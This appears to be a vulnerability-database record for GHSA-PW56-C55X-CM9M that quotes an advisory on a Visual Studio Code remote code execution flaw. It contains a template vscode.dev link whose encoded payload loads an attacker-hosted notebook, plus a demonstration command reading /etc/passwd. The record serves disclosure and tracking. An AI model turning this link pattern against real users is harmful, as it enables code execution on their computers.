{"uuid": "012fd93b-f333-4e95-9a7f-bd874a4ce37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/3441", "content": "> Thus, our command URI, which makes the user launch a new terminal, and instructs that terminal to run \u2018vim /etc/passwd\u2019. This opens the password file of the user\u2019s computer, demonstrating our ability to run code on their machine.\n\n> Once the server described above is run, when victim clicks a prepared link (for example https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://%5Bserver_location_goes_here%5D/something.ipynb%22) VSCode will load the file, detect it as a Jypiter Notebook, and immediately run a command on the user\u2019s machine.\n\nVisual Studio Code: Remote Code Execution\nhttps://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m\n\n\u0417\u0430 \u0441\u0441\u044b\u043b\u043a\u0443 \u0441\u043f\u0430\u0441\u0438\u0431\u043e @olegkovalov", "creation_timestamp": "2022-12-02T15:04:50.000000Z"}